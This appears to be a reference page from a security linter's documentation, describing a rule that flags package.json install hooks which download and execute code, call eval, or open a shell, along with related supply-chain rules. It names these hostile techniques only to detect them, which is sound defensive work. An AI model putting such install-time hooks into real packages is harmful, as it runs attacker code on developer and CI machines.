lintai docs

Appearance

Rule Reference

SEC743lintai-ai-securitystablejsonwarn

package.json: dangerous lifecycle script

package.json defines a dangerous install-time lifecycle script

Provider
lintai-ai-security
Surface
json
Scope
per_file
Tier
stable
Severity
warn
Confidence
high
Detection
structural
Remediation
message_only

Activation Model

Preset Membership

This rule is part of the builtin activation graph through these preset memberships.

supply-chainmembership

Lifecycle

Stable Lifecycle Contract

State

stable_gated

Graduation rationale

Checks committed package.json install-time lifecycle hooks for explicit download-exec, eval, or npm-explore shell behavior.

Deterministic signal basis

JsonSignals package manifest analysis over `scripts.preinstall|install|postinstall|prepare` values for download-exec patterns, `eval`, or `npm explore` shell execution.

Malicious corpus
package-manifest-dangerous-lifecycle-script
Benign corpus
package-manifest-safe-lifecycle-script
structured evidence required remediation reviewed
Canonical note

Structural stable rule intended as a high-precision check with deterministic evidence.

Nearby Signals

Related Rules

SEC744package.json: git or forge dependency sourcepackage.json installs a dependency from a git or forge shortcut sourcejsonstable
SEC745package.json: unbounded dependency versionpackage.json uses an unbounded dependency version like * or latestjsonstable
SEC753package.json: direct archive URL dependency sourcepackage.json installs a dependency from a direct archive URL sourcejsonstable
SEC301MCP config: shell trampolineMCP configuration shells out through sh -c or bash -cjsonstable
SEC302Config: insecure HTTP endpointConfiguration contains an insecure http:// endpointjsonstable
SEC303MCP config: credential env passthroughMCP configuration passes through credential environment variablesjsonstable

Why It Matters

Install-time lifecycle scripts run automatically during dependency installation, so a dangerous committed postinstall or preinstall path can execute attacker-controlled code on every developer or CI machine that installs the package.

What Triggers

SEC743 matches package.json lifecycle hooks such as preinstall, install, postinstall, or prepare when the script includes high-risk behavior like download-and-exec patterns, eval, or npm explore shell execution.

False Positives

Ordinary lifecycle scripts that run local build steps, type checks, or node ./scripts/... helpers do not trigger this rule. The rule is intentionally scoped to clearly dangerous execution patterns.

Remediation

Remove install-time remote execution behavior from the manifest and keep setup logic local, reviewable, and explicit.